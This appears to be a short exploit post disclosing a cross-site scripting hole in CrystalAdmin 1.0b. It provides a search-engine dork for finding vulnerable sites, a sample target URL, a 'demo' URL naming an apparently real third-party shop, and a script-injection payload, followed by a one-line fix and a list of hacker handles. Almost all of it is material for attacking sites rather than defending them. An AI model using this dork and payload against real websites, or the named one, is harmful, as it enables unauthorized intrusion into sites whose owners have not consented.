~ Title: CrystalAdmin Cross Site Scripting Vulnerability
~ Version: 1.0b
~ Author: P0W3RFU7
~ Credit: Ajax Security Team
~ Email: Pandidan@Gmail.com
=-=-=-=-=-=-=-=-=-=-=-=-(Vulnerability Details)-=-=-=-=-=-=-=-=-=-=-=-=
~ Dork: "/catalogue/products.asp?s="
~ Sample: http://www.target.com/catalogue/products.asp?s=[XSS]
~ Demo: http://www.airluxe.co.uk/catalogue/products.asp?s=[XSS]
~ XSS: <ScRiPt>alert('XSS Vuln')</sCriPt>
~ Fix: Filter input parameters for special characters
=-=-=-=-=-=-=-=-=-=-=-=-=-=(Thanks)=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
HUrr!c4nE - Cair3x - black.shadowes - hadihadi - iM4n - Mormoroth - irsdl
Mr.Hesy - 4m!n - Dj7xpl - Sc0rpion - Expl0its - The-0utl4w - Mikili - Net.Edit0r
md.r00t - S3Ri0uS - NeFrin - Skitt3r - Army.Hidden - Takpar (MBFF)